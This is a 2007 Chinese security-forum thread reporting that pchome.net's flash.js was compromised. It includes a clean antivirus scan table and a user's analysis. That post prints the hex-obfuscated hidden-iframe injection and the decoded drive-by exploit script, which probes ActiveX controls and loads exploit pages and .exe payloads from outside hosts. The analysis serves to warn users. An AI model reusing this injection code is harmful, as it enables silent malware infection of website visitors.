毒网？

小飞侠.net

ht tp://article.pchome.net/content-502393-7.html#topView

VirSCAN.org Scanned Report :
Scanned time   : 2007/12/27 06:26:57 (CST)
Scanner results: 全部的杀毒软件报告没有发现病毒!
File Name      : flash[1].rar
File Size      : 2363 byte
File Type      : RAR archive data, v1d, os
MD5            : 71f9fb97ec954d15663fda439f2d126a
SHA1           : 5af2e1502a19a6eaf9762db6b25ed782253488be
Online report  : ht tp://virscan.org/report/1776ac5a5206f8057221a56a5b537081.html

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
a-squared      3.0.0.126       2007.12.25        2007-12-25  2.83   -
安博士V3       2007.12.27.00   2007.12.27        2007-12-27  0.90   -
AntiVir        7.6.0.46        7.0.1.156         2007-12-26  2.07   -
Arcavir        1.0.4           200712251803      2007-12-25  1.31   -
AVAST          1.0.8           071226-0          2007-12-26  3.06   -
AVG            7.5.49.442      269.17.9/1197     2007-12-25  1.92   -
BitDefender    7.60825.962328  7.16518           2007-12-26  3.50   -
CA (VET)       9.0.0.143       31.3.5405         2007-12-26  10.82  -
ClamAV         0.91.2          5260              2007-12-26  0.01   -
Comodo         2.11            2.0.0.385         2007-12-26  0.77   -
CP Secure      1.1.0.655       2007.12.26        2007-12-26  4.64   -
Dr.WEB         4.44.0.9170     2007.12.26        2007-12-26  3.39   -
ewido          4.0.0.2         2007.12.26        2007-12-26  1.92   -
F-PROT         4.4.1.52        20071225          2007-12-25  2.15   -
F-SECURE       5.51.6100       2007.12.26.03     2007-12-26  2.96   -
飞塔           2.81-3.11       8.449             2007-12-03  0.27   -
ViRobot        20071226        2007.12.26        2007-12-26  0.37   -
IKARUS         T3.1.01.15      2007.12.26.70053  2007-12-26  1.23   -
江民杀毒       10.00.650       2007.12.25        2007-12-25  1.34   -
卡巴斯基       5.5.10          2007.12.26        2007-12-26  4.72   -
金山毒霸       2007.6.20.249   2007.12.26        2007-12-26  0.65   -
迈克菲         5.2.00          5192              2007-12-24  12.86  -
MKS_VIR        2.01            2007.12.26        2007-12-26  8.55   -
NOD32          2.70.10         2747              2007-12-25  0.01   -
NORMAN         5.91.08         5.90              2007-12-25  4.43   -
熊猫卫士       9.04.03.0001    2007.12.25        2007-12-25  2.55   -
趋势           8.500-1001      4.912.21          2007-12-26  0.04   -
Prevx          V2              20071227          2007-12-27  3.55   -
QuickHeal      9.00            2007.12.26        2007-12-26  2.23   -
瑞星           19.0            20.24.21.00       2007-12-26  0.48   -
SOPHOS         2.49.1          4.21              2007-12-25  4.23   -
赛门铁克       1.3.0.24        20071225.004      2007-12-25  0.17   -
nProtect       2007-12-26.00   1102464           2007-12-26  4.18   -
The Hacker     6.2.9           v00169            2007-12-26  0.64   -
VBA32          3.12.2.5        20071226.1052     2007-12-26  0.80   -
VirusBuster    4.3.19:9        9.118.6/11.0      2007-12-26  1.02   -

Graybird

The file 'flash[2].js' has been determined to be 'CLEAN'. Our analysts did not discovered any malicious content.

卡江东N

NOD32和AVG都不报。

y37007

   没报

jimmyleo

虽然pchome搭进搭出 但是这回是fil搭进了

dikex

挂得比较隐蔽，http://btn.pchome.net/flash.js的中间被加入了如下代码：

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');

也就是这个了：

window["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');

但只有这个js还不会使得那个iframe生效，使得他生效的是调用这个js显示flash 的代码：

<script language="javascript" type="text/javascript">
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");
</script>

有了这个，iframe就生效了；经过一番调用和解密后得：

function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mk:@MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mk:@MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}

挑了几个解密得：http://w18.vg/s.exe
从这个文件里面得到另外一个链接：http://w18.vg/ss.exe
有点面熟的东西……

从上面可以知道，出问题的是那个flash.js，因此所有使用这个js来放flash的页面全都有毒了！我随便找了几个页面，发现都是有毒的，这回可是大面积的被挂咯，同志们自己小心了。

水晶

不错费尔托斯安全软件

jimmyleo

原来是这样啊 我去试试 反正用着max～

啊弥陀佛

微点砍掉

qigang

哈哈，已经知道此事，样本也已经下载！